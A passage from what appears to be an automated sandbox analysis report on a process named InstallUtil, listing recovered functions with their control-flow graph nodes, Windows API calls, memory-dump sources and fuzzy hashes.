                                                                                                  control_flow_graph 714 65cd4f0-65cd556 715 65cd558-65cd55e 714->715 716 65cd561-65cd568 714->716 715->716 717 65cd56a-65cd570 716->717 718 65cd573-65cd612 CreateWindowExW 716->718 717->718 720 65cd61b-65cd653 718->720 721 65cd614-65cd61a 718->721 725 65cd655-65cd658 720->725 726 65cd660 720->726 721->720 725->726 727 65cd661 726->727 727->727
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065CD602
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: dc4170b829d7fb909e486eaced3cc0599e4ea2b691121a1762cfb3027bd80a15
                                                                                                  • Instruction ID: a92debf0f51422e45a6373692bb666fe8aeccfd16e2384353e4782586da62f19
                                                                                                  • Opcode Fuzzy Hash: dc4170b829d7fb909e486eaced3cc0599e4ea2b691121a1762cfb3027bd80a15
                                                                                                  • Instruction Fuzzy Hash: 0141AFB1D003499FDF14CF99C884ADEBBB5FF48310F24862AE819AB210D775A885CF90
                                                                                                  Function 065CE46C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 728 65ce46c-65cfc6c 731 65cfd1c-65cfd3c call 65ca48c 728->731 732 65cfc72-65cfc77 728->732 739 65cfd3f-65cfd4c 731->739 733 65cfc79-65cfcb0 732->733 734 65cfcca-65cfd02 CallWindowProcW 732->734 741 65cfcb9-65cfcc8 733->741 742 65cfcb2-65cfcb8 733->742 737 65cfd0b-65cfd1a 734->737 738 65cfd04-65cfd0a 734->738 737->739 738->737 741->739 742->741
                                                                                                  APIs
                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 065CFCF1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallProcWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714655100-0
                                                                                                  • Opcode ID: e8c728fe19d7b2ff76516f0d359344725d042080b4d81726591e5d887b1bd7d0
                                                                                                  • Instruction ID: d9389a78a11dd87bef5461cd932ce1a8dc977d7eef3cb5b0a75e7c90fe4d755c
                                                                                                  • Opcode Fuzzy Hash: e8c728fe19d7b2ff76516f0d359344725d042080b4d81726591e5d887b1bd7d0
                                                                                                  • Instruction Fuzzy Hash: FD4129B5A00309CFDB54CF99C448AAABBF5FF88324F24849DD519A7321D774A941CFA0
                                                                                                  Function 065C3048 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 745 65c3048-65c30e4 DuplicateHandle 746 65c30ed-65c310a 745->746 747 65c30e6-65c30ec 745->747 747->746
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065C30D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 5bd69bb809a751188bceba82950f5ab3e99b5700d26e22e175909a00d7c0bc40
                                                                                                  • Instruction ID: 1affbe0b99ea49bd8f7fdb4a8c72a97840152ac188abfc05aff94764f727eaa6
                                                                                                  • Opcode Fuzzy Hash: 5bd69bb809a751188bceba82950f5ab3e99b5700d26e22e175909a00d7c0bc40
                                                                                                  • Instruction Fuzzy Hash: A121E4B5D00209DFDB10CF9AD984AEEBBF4FB48320F14841AE914A7350D379A954CFA5
                                                                                                  Function 065C3050 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 750 65c3050-65c30e4 DuplicateHandle 751 65c30ed-65c310a 750->751 752 65c30e6-65c30ec 750->752 752->751
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065C30D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: d23c6ba0282d0f1a900956254e274beaff6c07f6c58cb82de7ae451903ae3ea3
                                                                                                  • Instruction ID: 9cb3ac24bbb06f05f886630146540237fbe88d8e659401567279d4f8e420961f
                                                                                                  • Opcode Fuzzy Hash: d23c6ba0282d0f1a900956254e274beaff6c07f6c58cb82de7ae451903ae3ea3
                                                                                                  • Instruction Fuzzy Hash: CA21B3B5D002499FDB10CF9AD984ADEBBF8FB48320F14841AE914A7250D379A954CFA5
                                                                                                  Function 0294EA80 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 755 294ea80-294eabe 757 294eac6-294eaf4 GlobalMemoryStatusEx 755->757 758 294eaf6-294eafc 757->758 759 294eafd-294eb25 757->759 758->759
                                                                                                  APIs
                                                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0294EAE7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4610403247.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2940000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                  • String ID:
                                                                                                  • API String ID: 1890195054-0
                                                                                                  • Opcode ID: 5e7a1c043db0d9e3a05040faa1c0c84ec4fed44ddda4ea206df1d49988dc359c
                                                                                                  • Instruction ID: 52a3667ac5f8ec88cb559a6f40b43e993f6bd3c07c4b12b2afbe428f0da6e9a2
                                                                                                  • Opcode Fuzzy Hash: 5e7a1c043db0d9e3a05040faa1c0c84ec4fed44ddda4ea206df1d49988dc359c
                                                                                                  • Instruction Fuzzy Hash: FC1123B1C0065A9FDB10CF9AC544BDEFBF4BF48320F10816AE918A7240D7B8A954CFA1
                                                                                                  Function 065CA2AC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 762 65ca2ac-65cb548 764 65cb54a-65cb54d 762->764 765 65cb550-65cb57b GetModuleHandleW 762->765 764->765 766 65cb57d-65cb583 765->766 767 65cb584-65cb598 765->767 766->767
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,065CB334), ref: 065CB56E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: b9b02f78f806d559acd625ca18eaa13575c0e8ff7d6c4b3f9782ce3ddbfb7fdb
                                                                                                  • Instruction ID: b6b5aba9d1cbbc9ff87645f6f6d4c465aa36986a786857623c187b7fd3bf3fe1
                                                                                                  • Opcode Fuzzy Hash: b9b02f78f806d559acd625ca18eaa13575c0e8ff7d6c4b3f9782ce3ddbfb7fdb
                                                                                                  • Instruction Fuzzy Hash: 9411F3B5D006498FDB10CF9AD444B9EFBF8EB48324F14845AD819A7210D379A545CFA5
                                                                                                  Function 065DCFB8 Relevance: .8, Instructions: 807COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2024 65dcfb8-65dcfd3 2025 65dcfd5-65dcfd8 2024->2025 2026 65dcfde-65dcfe1 2025->2026 2027 65dd4a4-65dd4b0 2025->2027 2030 65dcff0-65dcff3 2026->2030 2031 65dcfe3-65dcfe5 2026->2031 2028 65dd26e-65dd27d 2027->2028 2029 65dd4b6-65dd7a3 2027->2029 2032 65dd28c-65dd298 2028->2032 2033 65dd27f-65dd284 2028->2033 2238 65dd7a9-65dd7af 2029->2238 2239 65dd9ca-65dd9d4 2029->2239 2036 65dcff5-65dcff7 2030->2036 2037 65dd002-65dd005 2030->2037 2034 65dcfeb 2031->2034 2035 65dd4a1 2031->2035 2042 65dd29e-65dd2b0 2032->2042 2043 65dd9d5-65dd9ee 2032->2043 2033->2032 2034->2030 2035->2027 2038 65dcffd 2036->2038 2039 65dd35f-65dd368 2036->2039 2040 65dd04e-65dd051 2037->2040 2041 65dd007-65dd049 2037->2041 2038->2037 2045 65dd36a-65dd36f 2039->2045 2046 65dd377-65dd383 2039->2046 2047 65dd09a-65dd09d 2040->2047 2048 65dd053-65dd095 2040->2048 2041->2040 2060 65dd2b5-65dd2b8 2042->2060 2061 65dd9f5-65dda0e 2043->2061 2062 65dd9f0-65dd9f4 2043->2062 2045->2046 2050 65dd389-65dd39d 2046->2050 2051 65dd494-65dd499 2046->2051 2054 65dd09f-65dd0e1 2047->2054 2055 65dd0e6-65dd0e9 2047->2055 2048->2047 2050->2035 2079 65dd3a3-65dd3b5 2050->2079 2051->2035 2054->2055 2058 65dd0eb-65dd12d 2055->2058 2059 65dd132-65dd135 2055->2059 2058->2059 2063 65dd137-65dd14d 2059->2063 2064 65dd152-65dd155 2059->2064 2068 65dd2ba-65dd2fc 2060->2068 2069 65dd301-65dd304 2060->2069 2070 65dda10-65dda13 2061->2070 2062->2061 2063->2064 2076 65dd15f-65dd162 2064->2076 2077 65dd157-65dd15c 2064->2077 2068->2069 2074 65dd34d-65dd34f 2069->2074 2075 65dd306-65dd348 2069->2075 2080 65dda15-65dda41 2070->2080 2081 65dda46-65dda49 2070->2081 2089 65dd356-65dd359 2074->2089 2090 65dd351 2074->2090 2075->2074 2083 65dd1ab-65dd1ae 2076->2083 2084 65dd164-65dd173 2076->2084 2077->2076 2111 65dd3d9-65dd3db 2079->2111 2112 65dd3b7-65dd3bd 2079->2112 2080->2081 2085 65dda58-65dda5b 2081->2085 2086 65dda4b 2081->2086 2099 65dd1f7-65dd1fa 2083->2099 2100 65dd1b0-65dd1f2 2083->2100 2095 65dd175-65dd17a 2084->2095 2096 65dd182-65dd18e 2084->2096 2097 65dda5d-65dda79 2085->2097 2098 65dda7e-65dda80 2085->2098 2285 65dda4b call 65ddb2d 2086->2285 2286 65dda4b call 65ddb40 2086->2286 2089->2025 2089->2039 2090->2089 2095->2096 2096->2043 2104 65dd194-65dd1a6 2096->2104 2097->2098 2108 65dda87-65dda8a 2098->2108 2109 65dda82 2098->2109 2114 65dd1fc-65dd23e 2099->2114 2115 65dd243-65dd246 2099->2115 2100->2099 2104->2083 2105 65dda51-65dda53 2105->2085 2108->2070 2122 65dda8c-65dda9b 2108->2122 2109->2108 2127 65dd3e5-65dd3f1 2111->2127 2124 65dd3bf 2112->2124 2125 65dd3c1-65dd3cd 2112->2125 2114->2115 2118 65dd269-65dd26c 2115->2118 2119 65dd248-65dd264 2115->2119 2118->2028 2118->2060 2119->2118 2148 65dda9d-65ddb00 call 65d6618 2122->2148 2149 65ddb02-65ddb17 2122->2149 2132 65dd3cf-65dd3d7 2124->2132 2125->2132 2151 65dd3ff 2127->2151 2152 65dd3f3-65dd3fd 2127->2152 2132->2127 2148->2149 2159 65dd404-65dd406 2151->2159 2152->2159 2159->2035 2162 65dd40c-65dd428 call 65d6618 2159->2162 2177 65dd42a-65dd42f 2162->2177 2178 65dd437-65dd443 2162->2178 2177->2178 2178->2051 2180 65dd445-65dd492 2178->2180 2180->2035 2240 65dd7be-65dd7c7 2238->2240 2241 65dd7b1-65dd7b6 2238->2241 2240->2043 2242 65dd7cd-65dd7e0 2240->2242 2241->2240 2244 65dd9ba-65dd9c4 2242->2244 2245 65dd7e6-65dd7ec 2242->2245 2244->2238 2244->2239 2246 65dd7ee-65dd7f3 2245->2246 2247 65dd7fb-65dd804 2245->2247 2246->2247 2247->2043 2248 65dd80a-65dd82b 2247->2248 2251 65dd82d-65dd832 2248->2251 2252 65dd83a-65dd843 2248->2252 2251->2252 2252->2043 2253 65dd849-65dd866 2252->2253 2253->2244 2256 65dd86c-65dd872 2253->2256 2256->2043 2257 65dd878-65dd891 2256->2257 2259 65dd9ad-65dd9b4 2257->2259 2260 65dd897-65dd8be 2257->2260 2259->2244 2259->2256 2260->2043 2263 65dd8c4-65dd8ce 2260->2263 2263->2043 2264 65dd8d4-65dd8eb 2263->2264 2266 65dd8ed-65dd8f8 2264->2266 2267 65dd8fa-65dd915 2264->2267 2266->2267 2267->2259 2272 65dd91b-65dd934 call 65d6618 2267->2272 2276 65dd936-65dd93b 2272->2276 2277 65dd943-65dd94c 2272->2277 2276->2277 2277->2043 2278 65dd952-65dd9a6 2277->2278 2278->2259 2285->2105 2286->2105
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f6ef95dc612d7b057d7bb2df5dfdad7ef16df004b71c89a21c8ca929784317f
                                                                                                  • Instruction ID: 63a4b5e8b498f480c14d83a02a55c4f5175564fcbcdd56a372f58ca373161c26
                                                                                                  • Opcode Fuzzy Hash: 5f6ef95dc612d7b057d7bb2df5dfdad7ef16df004b71c89a21c8ca929784317f
                                                                                                  • Instruction Fuzzy Hash: F8623D30A0120A8FDB65EBA8D590A5EB7B6FFC5304F209A2DD0459F359DB75EC46CB80
                                                                                                  Function 065DAD48 Relevance: .4, Instructions: 400COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8c4688d3ebd99ea808882f5a07130b11db11fb196014405b4720c83ad74c8b61
                                                                                                  • Instruction ID: ab6817583ad3585d56c719ead0b0a947a9dd3ceb7549d99b5aeee2e6293fcdf9
                                                                                                  • Opcode Fuzzy Hash: 8c4688d3ebd99ea808882f5a07130b11db11fb196014405b4720c83ad74c8b61
                                                                                                  • Instruction Fuzzy Hash: D1E16074E1120A8FDF65DB68D8906AEB7B2FFC9304F208529D905EB384DF759846CB81
                                                                                                  Function 065DB2A2 Relevance: .3, Instructions: 295COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ad7d270638274845a1750bb522acfde1d313191b8d5ff884af0d3bc1ac58377d
                                                                                                  • Instruction ID: 3a448f55d18952b1d3fdd6e841bc39d28e112ad1a6cc69c7c366bf53537e2e58
                                                                                                  • Opcode Fuzzy Hash: ad7d270638274845a1750bb522acfde1d313191b8d5ff884af0d3bc1ac58377d
                                                                                                  • Instruction Fuzzy Hash: 6AA183B0E011098BEF74DAACC9907AEBBB7FB89310F214529E545EB3C5DA34DC818B51
                                                                                                  Function 065D4307 Relevance: .3, Instructions: 255COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9d6934b5db950c739fd59a26139a36e651641946d5c8c78c1888d6f8cc16aad4
                                                                                                  • Instruction ID: 3094947d2ad1d7ed12f818780d7547850469e32604226c9c33f14f63ceeb918b
                                                                                                  • Opcode Fuzzy Hash: 9d6934b5db950c739fd59a26139a36e651641946d5c8c78c1888d6f8cc16aad4
                                                                                                  • Instruction Fuzzy Hash: C7916D30B112468FDF55DFA8D8947AEBBF2BF85300F148569D40ADB295EA30DC86CB91
                                                                                                  Function 065D91C0 Relevance: .2, Instructions: 231COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0b9e67e4aef48195904138039d1692bfac23c59fe223cd4fab03f3074b9a27ed
                                                                                                  • Instruction ID: 2a6b0f3ba6246ef4931443837529dff2e67069f72afdefa872232e4653507c0f
                                                                                                  • Opcode Fuzzy Hash: 0b9e67e4aef48195904138039d1692bfac23c59fe223cd4fab03f3074b9a27ed
                                                                                                  • Instruction Fuzzy Hash: 8B914230B0025A8FDB64DB68D990BAEB7F6FFC5244F108569C409EB788EF749D418B91
                                                                                                  Function 065D6268 Relevance: .2, Instructions: 229COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 354635bf2eb6735d2e7b77a945030962232ac606a24d117badd73e46ec256cae
                                                                                                  • Instruction ID: 85fea1302bf73ef5a6c0cbcbeecb79cb94ae7d68eb7d2bfad9261d434db33015
                                                                                                  • Opcode Fuzzy Hash: 354635bf2eb6735d2e7b77a945030962232ac606a24d117badd73e46ec256cae
                                                                                                  • Instruction Fuzzy Hash: FB61C371F001614BDF64DA6DD88466FBAD7AFC4220F154479E90ADB364DEA5EC028BC1
                                                                                                  Function 065D4660 Relevance: .2, Instructions: 223COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ca52feca257246671f2cbf9a22bce34737b24e8d0f4ccf681e153011d0e8a030
                                                                                                  • Instruction ID: 319cc95f80566e0379ba2c4d9ede4ba194d4b4ae42d6aa13e1da30820538c94f
                                                                                                  • Opcode Fuzzy Hash: ca52feca257246671f2cbf9a22bce34737b24e8d0f4ccf681e153011d0e8a030
                                                                                                  • Instruction Fuzzy Hash: 84914D30E102598FDF60DF68C890B9DBBB1FF89310F208599D549BB285DB70AA85CF91
                                                                                                  Function 065D4350 Relevance: .2, Instructions: 218COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3f45e4c874990c4ee0a35cc2c87e9c5c7596323700454529a6496dc6eb569928
                                                                                                  • Instruction ID: cb28809920ddda0ba499f42fc3d7f2a0b9c10b51e617a2f130a421035c177903
                                                                                                  • Opcode Fuzzy Hash: 3f45e4c874990c4ee0a35cc2c87e9c5c7596323700454529a6496dc6eb569928
                                                                                                  • Instruction Fuzzy Hash: DE811B30B1124A8BDF54DFA9D5947AEB7F3BF89304F208529D40ADB384EA70DC868B51
                                                                                                  Function 065D4678 Relevance: .2, Instructions: 210COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9d7ea1c4a0141852a1b33dd630888dcdf25878432148543a45fcdd2c3247e639
                                                                                                  • Instruction ID: 6287d99a8b5167ec112efcb9217c78d72934a8cdbddd951665032746445ecf6f
                                                                                                  • Opcode Fuzzy Hash: 9d7ea1c4a0141852a1b33dd630888dcdf25878432148543a45fcdd2c3247e639
                                                                                                  • Instruction Fuzzy Hash: A3912E30E106198BDF64DF68C890B9DB7B1FF89310F208699D549BB385DB71AA85CF90
                                                                                                  Function 065DEB8A Relevance: .2, Instructions: 206COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: debc617e725a19167e928ca4a7c5e1c66999020b924d862bc4437ef40464b8eb
                                                                                                  • Instruction ID: 71757bf919f6ad24a1ec80eac8ad8b291b2224df876f10b81a57155d16f0b292
                                                                                                  • Opcode Fuzzy Hash: debc617e725a19167e928ca4a7c5e1c66999020b924d862bc4437ef40464b8eb
                                                                                                  • Instruction Fuzzy Hash: 41710B30A002499FDB64EFA9D991AADBBF6FFC4300F148529D405EB395DB34E946CB50
                                                                                                  Function 065DEB98 Relevance: .2, Instructions: 201COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6786a1fe283649a7f410a4d064b84038ac270aef240d30de077e0dc18c47dd9d
                                                                                                  • Instruction ID: a447fafcf224e1d0b11a51b34d3450d592dd9ff17868dc53a2654ff82a5353cc
                                                                                                  • Opcode Fuzzy Hash: 6786a1fe283649a7f410a4d064b84038ac270aef240d30de077e0dc18c47dd9d
                                                                                                  • Instruction Fuzzy Hash: 93710730A002499FDB64EFA9C981AADBBF6FFC8300F148529D405EB395DB70E946CB50
                                                                                                  Function 065D4C10 Relevance: .2, Instructions: 186COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 036c90b24610bcac80210d1c184992b6523439ab3387af06f6f6376de5ace557
                                                                                                  • Instruction ID: 69945d5dc73215861e9800c885865bb92b94c454d9453b8e8981f7939c1e8f77
                                                                                                  • Opcode Fuzzy Hash: 036c90b24610bcac80210d1c184992b6523439ab3387af06f6f6376de5ace557
                                                                                                  • Instruction Fuzzy Hash: EF616E70F102199FEF649BA9D8547AEBBF6FB88300F208529E106AB394DF754C458F91
                                                                                                  Function 065DFCF7 Relevance: .2, Instructions: 175COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c2fdad1234f1711fed46f98a93a3006fbeccae65e056042169c24c5006eb0e53
                                                                                                  • Instruction ID: d4cccd919f4461f0b6b8b1a277fc8965bc9d19ba0c95594493165598952a17aa
                                                                                                  • Opcode Fuzzy Hash: c2fdad1234f1711fed46f98a93a3006fbeccae65e056042169c24c5006eb0e53
                                                                                                  • Instruction Fuzzy Hash: E151CF31E01106DFCB64EBB8E4946ADBBB2FF85311F10887AE107D7291DB358955CB81
                                                                                                  Function 065DFAA9 Relevance: .2, Instructions: 172COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5498611d4de70d3c15226cc19d937273de410b24dac7bf63e5222ce23c9d22ef
                                                                                                  • Instruction ID: c8c190a0cc3a6128ab1c1b4816b939dbd2bdf1e4198b50a10c159da74a52551a
                                                                                                  • Opcode Fuzzy Hash: 5498611d4de70d3c15226cc19d937273de410b24dac7bf63e5222ce23c9d22ef
                                                                                                  • Instruction Fuzzy Hash: 09516C30B102159BFFB456FCD854B6F3A5AE7C9310F20442AE50AD77D6CE68CC528BA2
                                                                                                  Function 065D91B3 Relevance: .2, Instructions: 170COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1261b8b13ee655dee01a4423ff50b63586f027ca8d1cf344760ac4fbd3a579a5
                                                                                                  • Instruction ID: 6cc54bb050c80ec96234dd65cd240ea0ef4458f15a966f572329040e8c7268e9
                                                                                                  • Opcode Fuzzy Hash: 1261b8b13ee655dee01a4423ff50b63586f027ca8d1cf344760ac4fbd3a579a5
                                                                                                  • Instruction Fuzzy Hash: E1513130B012468FDB64EB68D990BAE73F6FFC9244F148569D40ADB388EA35DC418B91
                                                                                                  Function 065DFAB8 Relevance: .2, Instructions: 163COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
